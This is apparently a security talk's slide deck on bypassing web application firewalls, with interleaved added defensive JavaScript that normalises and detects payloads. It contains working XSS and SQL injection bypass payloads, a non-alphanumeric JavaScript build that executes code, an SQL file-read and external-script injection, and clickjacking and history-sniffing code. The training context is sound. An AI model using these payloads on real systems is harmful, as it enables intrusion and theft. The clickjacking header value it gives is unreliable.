
Bypassing Web Application Firewalls (WAFs)
Ing. Pavol Lupták, CISSP, CEH
Lead Security Consultant

www.nethemba.com

Nethemba - All About Security

Highly experienced certified IT security experts (CISSP, C|EH, SCSecA)
Core business: all kinds of penetration tests, comprehensive web application security audits, local system and wifi security audits, security consulting, forensic analysis, secure VoIP, ultra-secure systems
OWASP activists: leaders of the Slovak/Czech OWASP chapters, co-authors of the most recognized OWASP Testing Guide v3.0, working on the new version
We are the only ones in Slovakia/Czech Republic that offer:

Penetration tests and security audits of SAP

Security audits of smart RFID cards

Unique own and sponsored security research in many areas (see our references: vulnerabilities in public transport SMS tickets, cracked the most used Mifare Classic RFID cards)


What are WAFs?

Emerged from IDS/IPS, focused on the HTTP protocol and HTTP-related attacks
Usually contain a lot of complex regex rules to match
Support special features like cookie encryption, CSRF protection, etc.
Except for the free mod_security, they are quite expensive (and often there is no correlation between the price and their filtering capabilities)


WAF implementations

Usually they are deployed in blacklisting mode, which is more vulnerable to bypasses and targeted attacks
The application context (the type of allowed inputs) must be known in order to deploy the more secure whitelisting mode
All WAFs can be bypassed
A WAF is just a workaround, but from the security point of view it can be cost-effective

WAF filter rules

Directly reflect WAF effectiveness
For most WAF vendors they are closely guarded secrets; the most determined attackers are able to bypass them without seeing the actual rules
Open-source WAFs (mod_security, PHPIDS) have open-source rules, which is better because they receive more scrutiny from skilled penetration testers


Typical WAF bypasses

Blocked attack                          | Undetected modification
' or 1=1--                              | ' or 2=2--
alert(0)                                | %00alert(0)
<script>alert(0)</script>               | <script type=vbscript>MsgBox(0)</script>
' or ''''='r                            | '/**/OR/**/''''='
<script>alert(0)</script>               | <img src=x:x onerror=alert(0)></img>
<img src=x:x onerror=alert(0)//></img>  | <img src=http://url onload=alert(0)//></img>
1 or 1=1                                | (1)or(1)=(1)
eval(name)                              | x=this.name X(0?$:name+1)
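As an added example (not from the slides), the modified payloads from this table are run through a literal blacklist and then through intent-level rules applied after input normalisation; the rule sets, helper names and the outcome for the semantic-rewrite row are my own construction, chosen to mirror the table.

```javascript
// Added example (not from the slides): the modified payloads from the bypass
// table checked against literal blacklist rules and against intent-level rules
// applied to normalised input. Rule sets and helper names are my own.

// Literal patterns a naive blacklist might carry for the left-hand column.
const NAIVE_RULES = [/' or 1=1--/i, /<script>/i, /\b1 or 1=1\b/i, /\beval\(/i];

// Canonicalise before matching: percent-decode, drop NUL bytes (%00), replace
// /* */ comments with a space, collapse whitespace and lower-case.
function normalize(input) {
  let s = input;
  try { s = decodeURIComponent(s); } catch (e) { /* malformed %xx: keep raw */ }
  s = s.replace(/\0/g, '');
  s = s.replace(/\/\*[\s\S]*?\*\//g, ' ');
  return s.replace(/\s+/g, ' ').trim().toLowerCase();
}

// Patterns expressing the attack's intent, matched against normalised text.
const NORMALIZED_RULES = [
  /'\s*or\b/,                                   // quote followed by OR
  /\bor\s*\(?\s*(\w+)\s*\)?\s*=\s*\(?\s*\1\b/,  // tautology: or X = X, any X
  /<script\b/,                                  // script tag with any type
  /<\w+[^>]*\bon\w+\s*=/,                       // any tag carrying an event handler
  /\b(alert|eval)\s*\(/,                        // direct calls
];

function matches(rules, text) {
  return rules.some((rule) => rule.test(text));
}

// Right-hand column of the slide's table (the undetected modifications).
const MODIFIED_PAYLOADS = [
  "' or 2=2--",
  '<script type=vbscript>MsgBox(0)</script>',
  "'/**/OR/**/''''='",
  '<img src=x:x onerror=alert(0)></img>',
  '<img src=http://url onload=alert(0)//></img>',
  '(1)or(1)=(1)',
  'x=this.name X(0?$:name+1)', // semantic rewrite: no signature left to match
];

// One record per payload: caught by the naive set? caught after normalisation?
function evaluateTable() {
  return MODIFIED_PAYLOADS.map((payload) => ({
    payload,
    naive: matches(NAIVE_RULES, payload),
    normalized: matches(NORMALIZED_RULES, normalize(payload)),
  }));
}
```

The last row stays undetected by both sets: a payload rewritten to a different program with the same effect leaves no literal to match, which is the argument for whitelisting made later in the deck.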


Yes, a WAF may also be vulnerable!

A WAF also increases the attack surface of the target organization
A WAF may be the target of, and vulnerable to, malicious attacks, e.g. XSS, SQL injection, denial of service attacks, remote code execution vulnerabilities
These vulnerabilities have been found in all types of WAF products (!)


Typical bypass flow
1. Find out which characters/sequences are allowed by the WAF
2. Make an obfuscated version of your injected payload
3. Test it and watch the WAF/application response
4. If it does not work, modify it and go back to step 2


JavaScript obfuscation

JavaScript has very powerful features

A JavaScript payload is used in XSS attacks

It is full of evals, expression closures, generator expressions, iterators, special characters and shortcuts
Supports a lot of encodings (Unicode multibyte characters, hexadecimal, octal, and combinations of all of them)
Supports XOR, encryption, Base64


Non-alphanumeric JavaScript code
Even if only a few characters are allowed, it is possible to construct fully functional code:

_=[]|[];$=_++;__=(_<<_);___=(_<<_)+_;____=__+__;_____=__+___; // $=0, _=1, __=2, ___=3, ____=4, _____=5
$$=({}+"")[_____]+(+{}+"")[_]+({}[$]+"")[_]+(($!=$)+"")[___]+(($==$)+"")[$]+(($==$)+"")[_]+(($==$)+"")[__]+({}+"")[_____]+(($==$)+"")[$]+({}+"")[_]+(($==$)+"")[_]; // "constructor"
$$$=(($!=$)+"")[_]+(($!=$)+"")[__]+(($==$)+"")[___]+(($==$)+"")[_]+(($==$)+"")[$]; // "alert"
$_$=({}+"")[+_____]+({}+"")[_]+({}+"")[_]+(($!=$)+"")[__]+({}+"")[__+_____]+({}+"")[_____]+(+{}+"")[_]+({}[$]+"")[__]+(($==$)+"")[___]; // "cool code"
($)[$$][$$]($$$+"('"+$_$+"')")() // (0).constructor.constructor("alert('cool code')")()

([,,,,,,]=!{}+{},[[,]=!!+][+++])()[++++](~)


Let's bypass the WAF!

Example situation: the WAF blocks alpha characters and numbers (probably not a very realistic situation, just a proof of concept :)
It allows only a few special characters: ( ) { } _ = [ ] ; $ ! + < >
Let's generate fully non-alphanumeric JavaScript code!


Possibilities of the JavaScript language
We can use numbers to obtain a single character of a string, e.g. index zero for accessing the first character: abc[0]

We can use addition (+), subtraction (-), multiplication (*), division (/), modulus (%), increment (++), decrement (--)

We know that mathematical operators perform automatic numeric conversion and string operators perform automatic string conversion


Source of different alphanumeric characters in JavaScript

JavaScript object / error state | String result
{}+''                           | [object Object]
+[][+[]]                        | NaN
[][+[]]+[]                      | undefined
[![]]+[]                        | false
[!![]]+[]                       | true


Shortest possible ways to create zero without using numbers

Characters | Result
+[]        | 0
+''        | 0
+""        | 0
-[]        | 0
-''        | 0
-""        | 0


Generating numbers

+[] // 0

++[[]][+[]] // 1

+!+[] // 1

++[++[[]][+[]]][+[]] // 2

!+[]+!+[] // 2

++[++[++[[]][+[]]][+[]]][+[]] // 3

!+[]+!+[]+!+[] // 3


Gain alpha characters without directly using them

When we define a JavaScript object using the object literal and concatenate it with a string, the result is [object Object]

_={}+''; // [object Object]

alert(_[1]) // returns the 'o' character


Generate the string 'alert' without using any alphanumeric characters

Let's start with 'a'

Which JavaScript object contains 'a'?

We can use 'NaN' (Not a Number)

Access the empty array with index 0 (undefined) and convert it to a number (NaN)
+[][+[]] // result: NaN


Generating the 'a' character

NaN[1]='a'

++[[]][+[]] // 1

+[][+[]]+[] // result string: NaN

(+[][+[]]+[])[++[[]][+[]]] // a

We have the character 'a'


Generating the 'l' character

Use boolean false

We can use the ! (NOT) operator

e.g. ''==0 // true

Use a blank array (string) and then the NOT operator to obtain a boolean, wrap it with [] and convert it to a string
([![]]+[]) // string false


Generating the 'l' character

++[++[[]][+[]]][+[]] // 2

([![]]+[]) // string false

'false'[2]=([![]]+[])[++[++[[]][+[]]][+[]]] // 'l'
We have the 'l' character!


Generating the 'e' character

It's easy, we can use boolean true

([!![]]+[]) // string 'true'

++[++[++[[]][+[]]][+[]]][+[]] // 3

'true'[3]=([!![]]+[])[++[++[++[[]][+[]]][+[]]][+[]]] // e
And we have the 'e' character!


Generating the 'r' character

It's easy, we can use boolean true

([!![]]+[]) // string 'true'

++[[]][+[]] // 1

'true'[1]=([!![]]+[])[++[[]][+[]]] // r
And we have the 'r' character!


Generating the 't' character

It's easy, we can use boolean true

([!![]]+[]) // string 'true'

+[] // 0

'true'[0]=([!![]]+[])[+[]] // t

And we have the 't' character!


And now we have the 'alert' string!
(+[][+[]]+[])[++[[]][+[]]]+([![]]+[])[++[++[[]][+[]]][+[]]]+([!![]]+[])[++[++[++[[]][+[]]][+[]]][+[]]]+([!![]]+[])[++[[]][+[]]]+([!![]]+[])[+[]] // string 'alert'


How to execute the code of our choice?

It is necessary to obtain the window object to access all properties of window
If you can access a constructor, you can access the Function constructor to execute arbitrary code
The shortest possible way to get window is:
alert((1,[].sort)()) // shows the window object!

Works in all browsers except IE


How to generate the 'sort' string

We know how to generate the string 'alert'

We need to generate the string 'sort'
'false'[3]=([![]]+[])[++[++[++[[]][+[]]][+[]]][+[]]] // 's'

We can gain 'o' from []+{} ([object Object])
([]+{})[++[[]][+[]]] // o

We have already generated 'r' and 't'


And now we have the 'sort' string
([![]]+[])[++[++[++[[]][+[]]][+[]]][+[]]]+([]+{})[++[[]][+[]]]+([!![]]+[])[++[[]][+[]]]+([!![]]+[])[+[]] // string 'sort'
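The coercion steps of the previous slides, as an added example that is not part of the original deck: each building block is evaluated as ordinary JavaScript, the 'alert' and 'sort' strings are assembled from them, and a simple heuristic a defender can use to flag such payloads follows. The window-retrieval trick via (1,[].sort)() is not reproduced, because current engines throw a TypeError when Array.prototype.sort is called without a receiver; function names and the length threshold are assumptions.

```javascript
// Added example (not from the slides): the slides' coercion steps run as plain
// JavaScript so each building block can be checked, plus a defender-side
// heuristic for spotting such payloads. Names and the threshold are my own.

// Numbers without digits: +[] coerces "" to 0; prefix ++ on the element
// [[]][0] (an empty array) coerces it to 0 and increments it, giving 1, 2, 3.
const ZERO = +[];
const ONE = ++[[]][+[]];
const TWO = ++[++[[]][+[]]][+[]];
const THREE = ++[++[++[[]][+[]]][+[]]][+[]];

// Strings without letters, one per row of the "source of characters" table.
const NAN = +[][+[]] + [];   // +undefined is NaN; adding [] stringifies it
const FALSE = [![]] + [];    // [false] + [] -> "false"
const TRUE = [!![]] + [];    // [true] + [] -> "true"
const OBJ = [] + {};         // "" + {} -> "[object Object]"

// "alert": NaN[1], false[2], true[3], true[1], true[0].
function buildAlert() {
  return NAN[ONE] + FALSE[TWO] + TRUE[THREE] + TRUE[ONE] + TRUE[ZERO];
}

// "sort": false[3], [object Object][1], true[1], true[0].
function buildSort() {
  return FALSE[THREE] + OBJ[ONE] + TRUE[ONE] + TRUE[ZERO];
}

// The fully expanded expression from the slide, kept as source text so the
// heuristic below can be tested on it; evaluating it yields the same string.
const ALERT_SOURCE =
  "(+[][+[]]+[])[++[[]][+[]]]+([![]]+[])[++[++[[]][+[]]][+[]]]+([!![]]+[])" +
  "[++[++[++[[]][+[]]][+[]]][+[]]]+([!![]]+[])[++[[]][+[]]]+([!![]]+[])[+[]]";
function evalExpanded() {
  return eval(ALERT_SOURCE); // "alert"
}

// Heuristic for a WAF rule or log review: a value at least minLength long that
// consists only of the punctuation such payloads use (no letters or digits at
// all) is almost never legitimate user input. minLength is an assumed cut-off.
function looksLikeNonAlnumJs(value, minLength = 16) {
  return value.length >= minLength && /^[[\]()!+{}$_=;<>.,~]+$/.test(value);
}
```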


Let's build it together: call alert(1)

(1,[].sort)().alert(1)
After changing the number 1 and all alpha characters to their obfuscated versions we get:

([],[][([![]]+[])[++[++[++[[]][+[]]][+[]]][+[]]]+([]+{})[++[[]][+[]]]+([!![]]+[])[++[[]][+[]]]+([!![]]+[])[+[]]])()[(+[][+[]]+[])[++[[]][+[]]]+([![]]+[])[++[++[[]][+[]]][+[]]]+([!![]]+[])[++[++[++[[]][+[]]][+[]]][+[]]]+([!![]]+[])[++[[]][+[]]]+([!![]]+[])[+[]]](++[[]][+[]])

// calls alert(1)!


How to call any arbitrary JavaScript function

Using the array constructor (accessing the constructor twice from an array object returns Function):
[].constructor.constructor("alert(1)")()
We need to generate the remaining letters 'c', 'n', 'u'; gain them from the output of the [].sort function:
function sort() { [native code] }


SQL obfuscation

What is obfuscation of an SQL injection vector?
Different DBMSs have different SQL syntax; most of them support Unicode, Base64, hex, octal and binary representation, escaping, hashing algorithms (MD5, SHA1)
Many blacklisted characters can be replaced by their functional alternatives (0xA0 in MySQL)
Obfuscated comments: it is difficult to determine what is a comment and what is not

SQL obfuscation examples

SELECT CONCAT(char(x'70617373',b'1110111011011110111001001100100'))
s/*/e/**//*e*//*/l/*le*c*//*/ect~~/**/1
SELECT LOAD_FILE(0x633A5C626F6F742E696E69) (M)
SELECT(extractvalue(0x3C613E61646D696E3C2F613,0x2F61))
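To show what a rule engine should see for the first, third and fourth examples above, here is an added decoder (not from the slides) for the MySQL literal forms they use: 0x..., x'...', b'...' and CHAR() over them. Function names are my own, and the odd-length hex in the extractvalue example is deliberately left undecoded.

```javascript
// Added example (not from the slides): decode the numeric literal forms used in
// the SQL examples above (0x..., x'...', b'...' and CHAR(...) over them) so a
// rule engine sees the plain strings. Function names are my own.

// Hex digits -> byte string; odd length is left undecoded (e.g. a truncated literal).
function hexToString(hex) {
  if (hex.length % 2 !== 0) return null;
  let out = '';
  for (let i = 0; i < hex.length; i += 2) {
    out += String.fromCharCode(parseInt(hex.slice(i, i + 2), 16));
  }
  return out;
}

// MySQL CHAR() emits an integer as one byte per 8 bits, most significant first,
// so CHAR(b'...') of a 31-bit value yields four bytes.
function intToBytes(n) {
  let out = '';
  do { out = String.fromCharCode(n % 256) + out; n = Math.floor(n / 256); } while (n > 0);
  return out;
}

function decodeLiteral(token) {
  let m;
  if ((m = /^0x([0-9a-f]+)$/i.exec(token))) return hexToString(m[1]);
  if ((m = /^x'([0-9a-f]+)'$/i.exec(token))) return hexToString(m[1]);
  if ((m = /^b'([01]+)'$/i.exec(token))) return intToBytes(parseInt(m[1], 2));
  return null;
}

// Rewrite decodable literals as quoted strings, then fold CHAR('a','b') into 'ab'.
function normalizeSql(sql) {
  let s = sql.replace(/\b0x[0-9a-f]+|\b[xb]'[0-9a-f]+'/gi, (token) => {
    const decoded = decodeLiteral(token);
    return decoded === null ? token : `'${decoded}'`;
  });
  s = s.replace(/\bchar\s*\(\s*('[^']*'(?:\s*,\s*'[^']*')*)\s*\)/gi, (_, args) =>
    `'${args.match(/'([^']*)'/g).map((q) => q.slice(1, -1)).join('')}'`);
  return s;
}
```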


New SQL features

MySQL/PostgreSQL support XML functions:
SELECT UpdateXML('<script x=_></script>','/script/@x','src=//0x.lv');

HTML5 supports local DB storage (SQLite 3.1+) (openDatabase object); it can be misused for persistent XSS and local SQL injection attacks


Existing obfuscation tools

Hackvertor http://hackvertor.co.uk/public

HackBar https://addons.mozilla.org/en-US/firefox/addon/hack

Malzilla http://malzilla.sourceforge.net/

Your imagination :)


Summary

WAFs are just workarounds!

The best solution is to care about security in every SDLC phase and strictly validate all inputs and outputs in the application
Use whitelisting instead of blacklisting (both in the application and in the WAF!)
Use multi-layer security: a 3-layer database architecture or database firewalls

For SQL use prepared statements

For HTML use HTML Purifier or the OWASP AntiSamy project


References

Web Application Obfuscation
http://www.amazon.com/WebApplicationObfuscati

XSS Attacks: Cross Site Scripting Exploits and Defense
http://www.amazon.com/XSSAttacksScriptingExp
Special thanks to Mario Heiderich and Stefano Di Paola


UI redressing attacks: clickjacking
<style>
iframe{filter:alpha(opacity=0);opacity:0;position:absolute;top:0px;left:0px;height:300px;width:250px;}
img{position:absolute;top:0px;left:0px;height:300px;width:250px;}
</style>
<img src="WHAT THE USER SEES"/>

<iframe src="WHAT THE USER IS ACTUALLY INTERACTING WITH"></iframe>

Clickjacking protection

Block using X-FRAME-OPTIONS: NEVER

<body>
<script>
if(top!=self)document.write('<plaintext>');
</script>
...


CSS history attack
<style>
a{position:relative;}
a:visited{position:absolute;}
</style>
<a id=v href=http://www.google.com/>Google</a>
<script>
var l=document.getElementById('v');
var c=getComputedStyle(l).position;
c=='absolute'?alert('visited'):alert('not visited');
</script>


CSS history exploitation methods

Social network deanonymization attacks

Session ID / CSRF token local brute-force attack

LAN scanners

Fixed in Firefox 4.0; current browsers are vulnerable

